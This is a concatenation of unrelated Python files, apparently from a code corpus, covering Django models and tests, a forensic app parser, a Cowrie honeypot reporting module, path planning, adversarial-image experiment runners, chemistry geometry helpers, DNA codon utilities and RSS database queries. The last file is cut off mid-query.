group = models.ForeignKey('auth.Group', on_delete=models.CASCADE)
active_from = models.DateTimeField(blank=True, null=True)
active_until = models.DateTimeField(blank=True, null=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
verbose_name = _('directory access group')
verbose_name_plural = _('directory access groups')
ordering = ('organization', 'group')
|
38720
|
import sqlite3
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, open_sqlite_db_readonly
def get_installedappsGass(files_found, report_folder, seeker, wrap_text):
for file_found in files_found:
file_found = str(file_found)
if file_found.endswith('.db'):
db = open_sqlite_db_readonly(file_found)
cursor = db.cursor()
cursor.execute('''
SELECT
distinct(package_name)
FROM
app_info
''')
if 'user' in file_found:
usernum = file_found.split("/")
usernum = '_'+str(usernum[-4])
else:
usernum = ''
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
report = ArtifactHtmlReport('Installed Apps')
report.start_artifact_report(report_folder, f'Installed Apps (GMS){usernum}')
report.add_script()
data_headers = ('Bundle ID',) # Don't remove the comma, that is required to make this a tuple as there is only 1 element
data_list = []
for row in all_rows:
data_list.append((row[0],))
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = f'installed apps - GMS{usernum}'
tsv(report_folder, data_headers, data_list, tsvname)
else:
logfunc('No Installed Apps data available{usernum}')
db.close()
|
38802
|
import pytest
from django.core import mail
from test_fixtures.users import user
from .utils import send_activation_email, send_password_reset_email
@pytest.mark.django_db
def test_send_activtion_email(user, rf):
request = rf.request()
send_activation_email(user, request)
assert len(mail.outbox) == 1
@pytest.mark.django_db
def test_send_password_reset_email(user, rf):
request = rf.request()
send_password_reset_email(user, request)
assert len(mail.outbox) == 1
|
38812
|
from setuptools import setup, find_packages
REQUIRES = [
'Flask>=1.1.1',
'Flask-SocketIO>=4.2.1',
'Flask-Login>=0.4.1',
'requests>=2.22.0',
'pytz>=2019.2',
'paho-mqtt>=1.4.0',
'RPi.GPIO>=0.7.0',
]
setup(
name='AlarmPI',
version='4.7',
description='Home Security System',
author='bkbilly',
author_email='<EMAIL>',
packages=find_packages(),
install_requires=REQUIRES,
# long_description=open('README.md').read()
)
|
38834
|
import numpy as np
import networkx as nx
from commons import *
from tqdm import tqdm
def apply_rrt(state_space, starting_state, target_space, obstacle_map, granularity=0.1, d_threshold=0.5,
n_samples=1000, find_optimal=True):
tree = nx.DiGraph()
tree.add_node(starting_state)
final_state = None
min_cost = None
for i in tqdm(range(n_samples)):
# select node to expand
m_g, random_point = select_node_to_expand(tree, state_space)
# sample a new point
m_new = sample_new_point(m_g, random_point, d_threshold)
# check if m_new lies in space_region
if not lies_in_area(m_new, state_space):
continue
# check if path between(m_g,m_new) defined by motion-model is collision free
if not is_collision_free(m_g, m_new, obstacle_map, granularity):
continue
# if path is free, add new node to tree
tree.add_weighted_edges_from([(m_g, m_new, cartesian_distance(m_g, m_new))])
if lies_in_area(m_new, target_space):
if final_state is None:
final_state = m_new
min_cost = nx.dijkstra_path_length(tree, starting_state, m_new)
if not find_optimal:
break
else:
# if new final state has shorter cost, set it as final state
cost = nx.dijkstra_path_length(tree, starting_state, m_new)
if cost < min_cost:
final_state = m_new
min_cost = cost
if final_state is None:
print("Target not reached.")
return tree, final_state
|
38848
|
import argparse
from attacks.image_save_runner import ImageSaveAttackRunner
from attacks.selective_universal import SelectiveUniversal
from dataset import Dataset
from models import create_ensemble
from models.model_configs import config_from_string
parser = argparse.ArgumentParser(description='Defence')
parser.add_argument('--input_dir', metavar='DIR',
help='Input directory with images.')
parser.add_argument('--output_dir', metavar='FILE',
help='Output directory to save images.')
parser.add_argument('--max_epsilon', type=int, default=16, metavar='N',
help='Maximum size of adversarial perturbation. (default: 16.0)')
parser.add_argument('--npy_files', nargs='+', type=str)
parser.add_argument('--ensemble', nargs='+', help='Class names for the defensive ensemble.')
parser.add_argument('--ensemble_weights', nargs='+', type=float,
help='Weights for weighted geometric mean of output probs')
parser.add_argument('--checkpoint_paths', nargs='+', help='Paths to checkpoint files for each model.')
parser.add_argument('--try_mirrors', action='store_true', default=False)
def main():
args = parser.parse_args()
dataset = Dataset(args.input_dir, target_file='')
cfgs = [config_from_string(s) for s in args.ensemble]
target_model = create_ensemble(cfgs, args.ensemble_weights, args.checkpoint_paths).cuda()
target_model.eval()
attack = SelectiveUniversal(
target_model,
args.npy_files,
max_epsilon=args.max_epsilon,
try_mirrors = args.try_mirrors
)
runner = ImageSaveAttackRunner(dataset, args.output_dir)
# Only supports batch size of 1
runner.run(attack, 1)
if __name__ == '__main__':
main()
|
38850
|
from google.appengine.ext import ndb
CACHE_DATA = {}
def get(cache_key):
full_cache_key = '{}:{}'.format(cache_key, ndb.get_context().__hash__())
return CACHE_DATA.get(full_cache_key, None)
def set(cache_key, value):
full_cache_key = '{}:{}'.format(cache_key, ndb.get_context().__hash__())
CACHE_DATA[full_cache_key] = value
|
38867
|
import os
import sys
from gradslam.config import CfgNode as CN
cfg = CN()
cfg.TRAIN = CN()
cfg.TRAIN.HYPERPARAM_1 = 0.9
|
38879
|
import setuptools
with open("README.md", "r") as f:
long_description = f.read()
setuptools.setup(
name="django-osm-field",
author="<NAME>",
author_email="<EMAIL>",
description="Django OpenStreetMap Field",
license="MIT",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/MarkusH/django-osm-field",
project_urls={
"CI": "https://github.com/MarkusH/django-osm-field/actions", # noqa
"Changelog": "https://github.com/MarkusH/django-osm-field/blob/main/CHANGELOG.md", # noqa
"Issues": "https://github.com/MarkusH/django-osm-field/issues", # noqa
},
packages=setuptools.find_packages(
exclude=[
"*.example",
"*.example.*",
"example.*",
"example",
"*.tests",
"*.tests.*",
"tests.*",
"tests",
],
),
include_package_data=True,
install_requires=["Django>=2.2"],
extras_require={
"dev": ["pre-commit"],
"docs": [
"Django",
"sphinx_rtd_theme",
"Sphinx>=3.0,<3.4",
],
"test": [
"coverage[toml]>=5,<6",
"Django",
],
},
setup_requires=["setuptools_scm>=5<6"],
use_scm_version=True,
keywords="OpenStreetMap, OSM, Django, Geo, Geoposition",
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"Framework :: Django",
"Framework :: Django :: 2.2",
"Framework :: Django :: 3.0",
"Framework :: Django :: 3.1",
"Framework :: Django :: 3.2",
"Framework :: Django :: 4.0",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
],
python_requires=">=3.5",
)
|
38890
|
import numpy
print(str(numpy.eye(*map(int,input().split()))).replace('1',' 1').replace('0',' 0'))
|
38919
|
import os
import uuid
import pytest # type: ignore
from hopeit.testing.apps import execute_event
from hopeit.server.version import APPS_API_VERSION
from model import Something
from simple_example.collector.collect_spawn import ItemsInfo, ItemsCollected
APP_VERSION = APPS_API_VERSION.replace('.', "x")
@pytest.fixture
def sample_file_ids():
ids = [str(uuid.uuid4()), str(uuid.uuid4())]
for test_id in ids:
json_str = '{"id": "' + test_id + '", "user": {"id": "u1", "name": "test_user"}, ' \
+ '"status": {"ts": "2020-05-01T00:00:00Z", "type": "NEW"}, "history": []}'
os.makedirs(f'/tmp/simple_example.{APP_VERSION}.fs.data_path/', exist_ok=True)
with open(f'/tmp/simple_example.{APP_VERSION}.fs.data_path/{test_id}.json', 'w') as f:
f.write(json_str)
f.flush()
return ids
@pytest.mark.asyncio
async def test_find_two_items(app_config, sample_file_ids): # noqa: F811
payload = ItemsInfo(*sample_file_ids)
result, pp_result, response = await execute_event(app_config=app_config,
event_name='collector.collect_spawn',
payload=payload,
postprocess=True)
assert isinstance(result, list)
assert len(result) == 2
assert result[0].id == sample_file_ids[0]
assert result[1].id == sample_file_ids[1]
assert pp_result == 2
@pytest.mark.asyncio
async def test_find_one_item(app_config, sample_file_ids): # noqa: F811
payload = ItemsInfo(sample_file_ids[0], str(uuid.uuid4()))
result, pp_result, response = await execute_event(app_config=app_config,
event_name='collector.collect_spawn',
payload=payload,
postprocess=True)
assert isinstance(result, Something)
assert result.id == sample_file_ids[0]
assert pp_result == 1
@pytest.mark.asyncio
async def test_find_no_items(app_config, sample_file_ids): # noqa: F811
payload = ItemsInfo(str(uuid.uuid4()), str(uuid.uuid4()))
result, pp_result, response = await execute_event(app_config=app_config,
event_name='collector.collect_spawn',
payload=payload,
postprocess=True)
assert result == ItemsCollected([])
assert pp_result == 0
|
38997
|
from __future__ import annotations
import os
from datetime import datetime
from twisted.python import log
import cowrie.core.output
from cowrie.core.config import CowrieConfig
token = CowrieConfig.get("output_csirtg", "token", fallback="<PASSWORD>")
if token == "<PASSWORD>":
log.msg("output_csirtg: token not found in configuration file")
exit(1)
os.environ["CSIRTG_TOKEN"] = token
import csirtgsdk # noqa: E402
class Output(cowrie.core.output.Output):
"""
CSIRTG output
"""
def start(self):
"""
Start the output module.
Note that csirtsdk is imported here because it reads CSIRTG_TOKEN on import
Cowrie sets this environment variable.
"""
self.user = CowrieConfig.get("output_csirtg", "username")
self.feed = CowrieConfig.get("output_csirtg", "feed")
self.debug = CowrieConfig.getboolean("output_csirtg", "debug", fallback=False)
self.description = CowrieConfig.get("output_csirtg", "description")
self.context = {}
# self.client = csirtgsdk.client.Client()
def stop(self):
pass
def write(self, e):
"""
Only pass on connection events
"""
if e["eventid"] == "cowrie.session.connect":
self.submitIp(e)
def submitIp(self, e):
peerIP = e["src_ip"]
ts = e["timestamp"]
system = e.get("system", None)
if system not in [
"cowrie.ssh.factory.CowrieSSHFactory",
"cowrie.telnet.transport.HoneyPotTelnetFactory",
]:
return
today = str(datetime.now().date())
if not self.context.get(today):
self.context = {}
self.context[today] = set()
key = ",".join([peerIP, system])
if key in self.context[today]:
return
self.context[today].add(key)
tags = "scanner,ssh"
port = 22
if e["system"] == "cowrie.telnet.transport.HoneyPotTelnetFactory":
tags = "scanner,telnet"
port = 23
i = {
"user": self.user,
"feed": self.feed,
"indicator": peerIP,
"portlist": port,
"protocol": "tcp",
"tags": tags,
"firsttime": ts,
"lasttime": ts,
"description": self.description,
}
if self.debug is True:
log.msg(f"output_csirtg: Submitting {i!r} to CSIRTG")
ind = csirtgsdk.indicator.Indicator(i).submit()
if self.debug is True:
log.msg(f"output_csirtg: Submitted {ind!r} to CSIRTG")
log.msg("output_csirtg: submitted to csirtg at {} ".format(ind["location"]))
|
38999
|
import sys
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
fn = sys.argv[1]
pal = sns.color_palette()
with open(fn) as f:
toPlot = []
names = []
goodness = []
xs = []
ys = []
ps = []
sns.set()
for line in f:
tokens = line.split(' ')
if len(tokens) == 1:
numBins = int(tokens[0])
for i in range(0, numBins):
toPlot.append([])
xs.append([])
ys.append([])
ps.append([])
names.append('')
goodness.append(0)
else:
binId = int(tokens[0])
plotNum = int(tokens[1])
val = int(tokens[2])
xs[plotNum].append(int(tokens[4]))
ys[plotNum].append(int(tokens[5]))
ps[plotNum].append(int(tokens[6]))
toPlot[plotNum].append(val)
names[plotNum] = str(binId)
goodness[plotNum] = int(tokens[3])
for i in range(0, len(toPlot)):
clr = pal[2]
#sns.distplot(toPlot[i], kde=False, bins = 50, color=clr)
#plt.title('bin ' + names[i])
#plt.savefig('figures/binHist' + str(i+1) + '.png')
#plt.cla()
#plt.clf()
#plt.close()
sns.lineplot(x=xs[i], y=ys[i], color = pal[0])
sns.lineplot(x=xs[i], y=ps[i], color = clr)
plt.title('bin ' + names[i])
plt.savefig('figures/binScatter' + str(i+1) + '.png')
plt.cla()
plt.clf()
plt.close()
|
39014
|
import os
import unittest
import invirtualenv.contextmanager
class TestContextmanager(unittest.TestCase):
def test__revert_file(self):
with invirtualenv.contextmanager.InTemporaryDirectory():
with open('testfile', 'w') as fh:
fh.write('original')
self.assertEqual('original', open('testfile').read())
with invirtualenv.contextmanager.revert_file('testfile'):
with open('testfile', 'w') as fh:
fh.write('changed')
self.assertEqual('changed', open('testfile').read())
self.assertEqual('original', open('testfile').read())
def test__InTemporaryDir(self):
with invirtualenv.contextmanager.InTemporaryDirectory() as tempdir:
self.assertIsInstance(tempdir, str)
self.assertTrue(os.path.exists(tempdir))
|
39025
|
from pyqchem.structure import Structure
import numpy as np
# Ethene parallel position
def dimer_ethene(distance, slide_y, slide_z):
coordinates = [[0.0000000, 0.0000000, 0.6660120],
[0.0000000, 0.0000000, -0.6660120],
[0.0000000, 0.9228100, 1.2279200],
[0.0000000, -0.9228100, 1.2279200],
[0.0000000, -0.9228100, -1.2279200],
[0.0000000, 0.9228100, -1.2279200],
[distance, 0.0000000, 0.6660120],
[distance, 0.0000000, -0.6660120],
[distance, 0.9228100, 1.2279200],
[distance, -0.9228100, 1.2279200],
[distance, -0.9228100, -1.2279200],
[distance, 0.9228100, -1.2279200]]
coordinates = np.array(coordinates)
coordinates[6:, 1] = coordinates[6:, 1] + slide_y
coordinates[6:, 2] = coordinates[6:, 2] + slide_z
symbols = ['C', 'C', 'H', 'H', 'H', 'H', 'C', 'C', 'H', 'H', 'H', 'H']
molecule = Structure(coordinates=coordinates,
symbols=symbols,
charge=0)
return molecule, {'state_threshold': 0.2,
'n_mon': 6}
# Tetracloroethene
def dimer_tetrafluoroethene(distance, slide_y, slide_z):
monomer = [[ 0.6624670117, 0.0000000000, 0.0000000000],
[-0.6624670117, 0.0000000000, 0.0000000000],
[ 1.3834661472, 1.0993897934, 0.0000000000],
[ 1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, 1.0993897934, 0.0000000000]]
symbols = ['C', 'C', 'F', 'F', 'F', 'F']
monomer2 = np.array(monomer)
#monomer2 = np.dot(monomer, rotation_matrix([0, 1, 0], np.pi / 2))
monomer2[:, 2] = monomer2[:, 2] + distance
monomer2[:, 1] = monomer2[:, 1] + slide_y
monomer2[:, 0] = monomer2[:, 0] + slide_z
coordinates = np.vstack([monomer, monomer2])
molecule = Structure(coordinates=coordinates,
symbols=symbols * 2,
charge=0)
return molecule, {'state_threshold': 0.2,
'n_mon': len(monomer)}
# Tetracloroethene
def dimer_mix(distance, slide_y, slide_z):
monomer1 = [[ 0.6660120, 0.0000000, 0.0000000,],
[-0.6660120, 0.0000000, 0.0000000,],
[ 1.2279200, 0.9228100, 0.0000000,],
[ 1.2279200, -0.9228100, 0.0000000,],
[-1.2279200, -0.9228100, 0.0000000,],
[-1.2279200, 0.9228100, 0.0000000,]]
symbols1 = ['C', 'C', 'H', 'H', 'H', 'H']
monomer2 = [[ 0.6624670117, 0.0000000000, 0.0000000000],
[-0.6624670117, 0.0000000000, 0.0000000000],
[ 1.3834661472, 1.0993897934, 0.0000000000],
[ 1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, 1.0993897934, 0.0000000000]]
symbols2 = ['C', 'C', 'F', 'F', 'F', 'F']
monomer2 = np.array(monomer2)
monomer2[:, 2] = monomer2[:, 2] + distance
monomer2[:, 1] = monomer2[:, 1] + slide_y
monomer2[:, 0] = monomer2[:, 0] + slide_z
coordinates = np.vstack([monomer1, monomer2])
symbols = symbols1 + symbols2
molecule = Structure(coordinates=coordinates,
symbols=symbols,
charge=0)
return molecule, {'state_threshold': 0.4,
'n_mon': len(monomer1)}
|
39065
|
import cv2
def webcam_gui(filter_func, video_src=0):
cap = cv2.VideoCapture(video_src)
key_code = -1
while(key_code == -1):
# read a frame
ret, frame = cap.read()
# run filter with the arguments
frame_out = filter_func(frame)
# show the image
cv2.imshow('Press any key to exit', frame_out)
# wait for the key
key_code = cv2.waitKey(10)
cap.release()
cv2.destroyAllWindows()
def edge_filter(frame_in):
# convert into gray scale
frame_gray = cv2.cvtColor(frame_in, cv2.COLOR_BGR2GRAY)
# blur the image to reduce noise
frame_blur = cv2.blur(frame_gray, (3,3))
# Canny edge detection
frame_out = cv2.Canny(frame_blur, 30, 120)
return frame_out
def gray_filter(frame_in):
# convert into gray scale
frame_out = cv2.cvtColor(frame_in, cv2.COLOR_BGR2GRAY)
return frame_out
if __name__ == "__main__":
cv2.VideoCapture.set(CV_CAP_PROP_FPS, 10)
webcam_gui(edge_filter)
|
39069
|
import ast
import os
from mr_proper.public_api import is_function_pure
from mr_proper.utils.ast import get_ast_tree
def test_ok_for_destructive_assignment():
funcdef = ast.parse("""
def foo(a):
b, c = a
return b * c
""".strip()).body[0]
assert is_function_pure(funcdef)
def test_is_function_pure_fail_case():
funcdef = ast.parse("""
def foo(a):
print(a)
""".strip()).body[0]
assert not is_function_pure(funcdef)
def test_is_function_pure_fail_case_for_recursive():
test_file_path = os.path.join(os.path.dirname(__file__), 'test_files/test.py')
ast_tree = get_ast_tree(test_file_path)
foo_node = ast_tree.body[0]
assert not is_function_pure(
foo_node,
file_ast_tree=ast_tree,
pyfilepath=test_file_path,
recursive=True,
)
|
39083
|
from typing import Dict, Any
from allenact.algorithms.onpolicy_sync.losses import PPO
from allenact.algorithms.onpolicy_sync.losses.ppo import PPOConfig
from allenact.utils.experiment_utils import LinearDecay, PipelineStage
from baseline_configs.one_phase.one_phase_rgb_base import (
OnePhaseRGBBaseExperimentConfig,
)
class OnePhaseRGBPPOExperimentConfig(OnePhaseRGBBaseExperimentConfig):
USE_RESNET_CNN = False
@classmethod
def tag(cls) -> str:
return "OnePhaseRGBPPO"
@classmethod
def num_train_processes(cls) -> int:
return 40
@classmethod
def _training_pipeline_info(cls, **kwargs) -> Dict[str, Any]:
"""Define how the model trains."""
training_steps = cls.TRAINING_STEPS
return dict(
named_losses=dict(
ppo_loss=PPO(clip_decay=LinearDecay(training_steps), **PPOConfig)
),
pipeline_stages=[
PipelineStage(loss_names=["ppo_loss"], max_stage_steps=training_steps,)
],
num_steps=64,
num_mini_batch=1,
update_repeats=3,
use_lr_decay=True,
lr=3e-4,
)
|
39095
|
import numpy as np
class SequenceTools(object):
dna2gray_ = {'c': (0, 0), 't': (1, 0), 'g': (1, 1), 'a': (0, 1)}
gray2dna_ = {(0, 0): 'c', (1, 0): 't', (1, 1): 'g', (0, 1): 'a'}
codon2protein_ = {'ttt': 'f', 'ttc': 'f', 'tta': 'l', 'ttg': 'l', 'tct': 's', 'tcc': 's', 'tca': 's',
'tcg': 's', 'tat': 'y', 'tac': 'y', 'taa': '!', 'tag': '!', 'tgt': 'c', 'tgc': 'c',
'tga': '!', 'tgg': 'w', 'ctt': 'l', 'ctc': 'l', 'cta': 'l', 'ctg': 'l', 'cct': 'p',
'ccc': 'p', 'cca': 'p', 'ccg': 'p', 'cat': 'h', 'cac': 'h', 'caa': 'q', 'cag': 'q',
'cgt': 'r', 'cgc': 'r', 'cga': 'r', 'cgg': 'r', 'att': 'i', 'atc': 'i', 'ata': 'i',
'atg': 'm', 'act': 't', 'acc': 't', 'aca': 't', 'acg': 't', 'aat': 'n', 'aac': 'n',
'aaa': 'k', 'aag': 'k', 'agt': 's', 'agc': 's', 'aga': 'r', 'agg': 'r', 'gtt': 'v',
'gtc': 'v', 'gta': 'v', 'gtg': 'v', 'gct': 'a', 'gcc': 'a', 'gca': 'a', 'gcg': 'a',
'gat': 'd', 'gac': 'd', 'gaa': 'e', 'gag': 'e', 'ggt': 'g', 'ggc': 'g', 'gga': 'g',
'ggg': 'g'}
protein2codon_ = {
'l': ['tta', 'ttg', 'ctt', 'ctc', 'cta', 'ctg'],
's': ['tct', 'tcc', 'tca', 'tcg', 'agt', 'agc'],
'r': ['cgt', 'cgc', 'cga', 'cgg', 'aga', 'agg'],
'v': ['gtt', 'gtc', 'gta', 'gtg'],
'a': ['gct', 'gcc', 'gca', 'gcg'],
'p': ['cct', 'ccc', 'cca', 'ccg'],
't': ['act', 'acc', 'aca', 'acg'],
'g': ['ggt', 'ggc', 'gga', 'ggg'],
'stop': ['taa', 'tag', 'tga'],
'i': ['att', 'atc', 'ata'],
'y': ['tat', 'tac'],
'f': ['ttt', 'ttc'],
'c': ['tgt', 'tgc'],
'h': ['cat', 'cac'],
'q': ['caa', 'cag'],
'n': ['aat', 'aac'],
'k': ['aaa', 'aag'],
'd': ['gat', 'gac'],
'e': ['gaa', 'gag'],
'w': ['tgg'],
'm': ['atg']
}
protein2constraint_ = {
'l': {(1,): {('t',)}, (0, 2): {('t', 'a'), ('t', 'g'), ('c', 't'), ('c', 'c'), ('c', 'a'), ('c', 'g')}},
's': {(0, 1, 2): {('t', 'c', 't'), ('t', 'c', 'c'), ('t', 'c', 'a'), ('t', 'c', 'g'), ('a', 'g', 't'),
('a', 'g', 'c')}},
'r': {(1,): {('g',)}, (0, 2): {('c', 't'), ('c', 'c'), ('c', 'a'), ('c', 'g'), ('a', 'a'), ('a', 'g')}},
'v': {(0,): {('g',)}, (1,): {('t',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'a': {(0,): {('g',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'p': {(0,): {('c',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
't': {(0,): {('a',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'g': {(0,): {('g',)}, (1,): {('g',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'stop': {(0,): {('t',)}, (1, 2): {('a', 'a'), ('a', 'g'), ('g', 'a')}},
'i': {(0,): {('a',)}, (1,): {('t',)}, (2,): {('t',), ('a',), ('c',)}},
'y': {(0,): {('t',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'f': {(0,): {('t',)}, (1,): {('t',)}, (2,): {('t',), ('c',)}},
'c': {(0,): {('t',)}, (1,): {('g',)}, (2,): {('t',), ('c',)}},
'h': {(0,): {('c',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'q': {(0,): {('c',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'n': {(0,): {('a',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'k': {(0,): {('a',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'd': {(0,): {('g',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'e': {(0,): {('g',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'w': {(0,): {('t',)}, (1,): {('g',)}, (2,): {('g',)}},
'm': {(0,): {('a',)}, (1,): {('t',)}, (2,): {('g',)}},
}
# Integer mapping from Fernandes and Vinga (2016)
codon2idx_ = {'aaa': 1, 'aac': 2, 'aag': 3, 'aat': 4, 'aca': 5, 'acc': 6, 'acg': 7, 'act': 8, 'aga': 9,
'agc': 10, 'agg': 11, 'agt': 12, 'ata': 13, 'atc': 14, 'atg': 15, 'att': 16, 'caa': 17,
'cac': 18, 'cag': 19, 'cat': 20, 'cca': 21, 'ccc': 22, 'ccg': 23, 'cct': 24, 'cga': 25,
'cgc': 26, 'cgg': 27, 'cgt': 28, 'cta': 29, 'ctc': 30, 'ctg': 31, 'ctt': 32, 'gaa': 33,
'gac': 34, 'gag': 35, 'gat': 36, 'gca': 37, 'gcc': 38, 'gcg': 39, 'gct': 40, 'gga': 41,
'ggc': 42, 'ggg': 43, 'ggt': 44, 'gta': 45, 'gtc': 46, 'gtg': 47, 'gtt': 48, 'taa': 49,
'tac': 50, 'tag': 51, 'tat': 52, 'tca': 53, 'tcc': 54, 'tcg': 55, 'tct': 56, 'tga': 57,
'tgc': 58, 'tgg': 59, 'tgt': 60, 'tta': 61, 'ttc': 62, 'ttg': 63, 'ttt': 64}
@staticmethod
def convert_dna_to_rna(seq):
dna2rna = {'t': 'u', 'a': 'a', 'g': 'g', 'c': 'c'}
return "".join([dna2rna[s] for s in seq])
@staticmethod
def convert_dna_arr_to_str(dna_arr, base_order='ATCG'):
""" Convert N x 4 tokenized array into length N string """
dna_seq_str = ''
for i in range(dna_arr.shape[0]):
token = np.argmax(dna_arr[i, :])
dna_seq_str += base_order[token]
return dna_seq_str
@staticmethod
def get_aa_codons():
aa_list = sorted(list(SequenceTools.protein2codon_.keys()))
aa_codons = np.zeros((len(aa_list), 6, 3, 4))
i = 0
for aa in aa_list:
cods = SequenceTools.protein2codon_[aa]
j = 0
for c in cods:
cod_arr = SequenceTools.convert_dna_str_to_arr(c)
aa_codons[i, j] = cod_arr
j += 1
i += 1
return aa_codons
@staticmethod
def convert_dna_str_to_arr(dna_str, base_order='ATCG'):
""" Convert length N string into N x 4 tokenized array"""
dna_str = dna_str.upper()
N = len(dna_str)
dna_arr = np.zeros((N, 4))
for i in range(N):
idx = base_order.index(dna_str[i])
dna_arr[i, idx] = 1.
return dna_arr
@staticmethod
def convert_dna_arr_to_gray(dna_arr, base_order='ATCG'):
""" Convert N x 4 tokenized array into 2N x 2 tokenized gray code array"""
N = dna_arr.shape[0]
gray_arr = np.zeros((2 * N, 2))
for i in range(N):
token = np.argmax(dna_arr[i, :])
dna_i = base_order[token]
gray_i = SequenceTools.dna2gray_[dna_i]
for j in range(2):
gray_arr[2 * i + j, gray_i[j]] = 1
return gray_arr
@staticmethod
def convert_gray_to_dna_str(gray_arr):
Ngray = gray_arr.shape[0]
dna_str = ''
i = 0
while i < Ngray:
g1 = int(np.argmax(gray_arr[i, :]))
g2 = int(np.argmax(gray_arr[i + 1, :]))
dna_str += SequenceTools.gray2dna_[(g1, g2)]
i += 2
return dna_str
@staticmethod
def convert_dna_str_to_gray(dna_str):
"""Convert length N string into 2N x 2 tokenized gray code array"""
dna_str = dna_str.lower()
N = len(dna_str)
gray_arr = np.zeros((2 * N, 2))
for i in range(N):
gray_i = SequenceTools.dna2gray_[dna_str[i]]
for j in range(2):
gray_arr[2 * i + j, gray_i[j]] = 1
return gray_arr
@staticmethod
def convert_rna_to_dna(seq):
rna2dna = {'u': 't', 'a': 'a', 'g': 'g', 'c': 'c'}
return "".join([rna2dna[s] for s in seq])
@classmethod
def get_codon_from_idx(cls, idx):
idx2codon = {val: key for key, val in SequenceTools.codon2idx_.items()}
return idx2codon[idx]
@classmethod
def get_start_codon_int(cls):
return SequenceTools.codon2idx_['atg']
@classmethod
def get_stop_codon_ints(cls):
stop_codons = SequenceTools.protein2codon_['stop']
return [SequenceTools.codon2idx_[s] for s in stop_codons]
@classmethod
def translate_dna_str(cls, dna_seq):
dna_seq = dna_seq.lower()
prot_seq = []
i = 0
while i < len(dna_seq):
cod = dna_seq[i:i + 3]
prot_seq.append(SequenceTools.codon2protein_[cod])
i += 3
prot_seq = "".join(prot_seq)
return prot_seq
|
39125
|
from .version import version as __version__
# Delay importing extension modules till after they are built...
try:
from .sxn import *
from . import xdm
# This SaxonProcessor object is used only to control creation and
# destruction of the Saxon/C Java VM...
_sp_init = SaxonProcessor(False, init=True)
except ImportError:
pass
|
39141
|
import config
from selectsql import SelectSql
class RssSql(object):
def __init__(self):
self.database = config.get_database_config()
self.select_sql = SelectSql(self.database)
self.do_not_success = "do_not_success"
self.do_success = "do_success"
self.user = {}
self.xpath = {}
self.xpath_id = -1
#not success,return []
async def get_user_id_password(self,user_name):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
SELECT user_id,user_name,password FROM rss_user WHERE user_name = $1
""",user_name)
await conn.close()
return res
#not success,return []
async def insert_xpath(self,user_id,
site_url,
entry_css,
entry_link_css,
add_base_url,
rss_link_prefix,
site_title_css,
site_motto_css,
entry_content_css,
author_css,
datetime_css,
interval_time,
rss_link,
base_url):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
INSERT INTO xpath (user_id,site_url,
entry_css,entry_link_css,add_base_url,
rss_link_prefix,site_title_css,site_motto_css,
entry_content_css,author_css,datetime_css,
interval_time,rss_link,base_url)
VALUES ($1,$2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14)
RETURNING xpath_id;
""",user_id,site_url,entry_css,entry_link_css,
add_base_url,rss_link_prefix,
site_title_css,site_motto_css,entry_content_css,
author_css,datetime_css,interval_time,rss_link,base_url)
await conn.close()
return res
#not success,return []
async def get_xpath_interval_one(self,xpath_id):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
SELECT xpath_id,interval_time FROM xpath WHERE xpath_id = $1
""",xpath_id)
await conn.close()
return res
#not success,return []
async def get_xpath_id_interval_all(self):
conn = await self.select_sql.sql_conn()
res = await conn.fetch("""
SELECT xpath_id,interval_time FROM xpath
""")
await conn.close()
return res
#not success,return []
async def get_xpath_from_user_id(self,user_id):
conn = await self.select_sql.sql_conn()
res = await conn.fetch("""
SELECT * FROM xpath WHERE user_id = $1
""", user_id)
await conn.close()
return res
#not success,return []
async def get_xpath_one_from_xpath_id(self,xpath_id):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
SELECT * FROM xpath WHERE xpath_id = $1
""", xpath_id)
await conn.close()
return res
#not success,return []
async def get_xpath_one_from_url_name(self,url_name):
conn = await self.select_sql.sql_conn()
res = await conn.fetch("""
SELECT * FROM xpath WHERE rss_link = $1
""", url_name)
await conn.close()
#print(f"the user_id is:{user_id}")
#print(f"the rss is:{res}")
return res
#not success,return []
async def update_xpath_one_from_rss_link(self,
site_url,
entry_css,
entry_link_css,
add_base_url,
site_title_css,
site_motto_css,
entry_content_css,
author_css,
datetime_css,
interval_time,
rss_link,
base_url
):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
UPDATE xpath SET site_url = $1,
entry_css = $2,entry_link_css = $3,add_base_url = $4,
site_title_css = $5,site_motto_css = $6,entry_content_css = $7,
author_css = $8,datetime_css = $9,interval_time = $10,
base_url = $11
WHERE rss_link = $12 RETURNING xpath_id
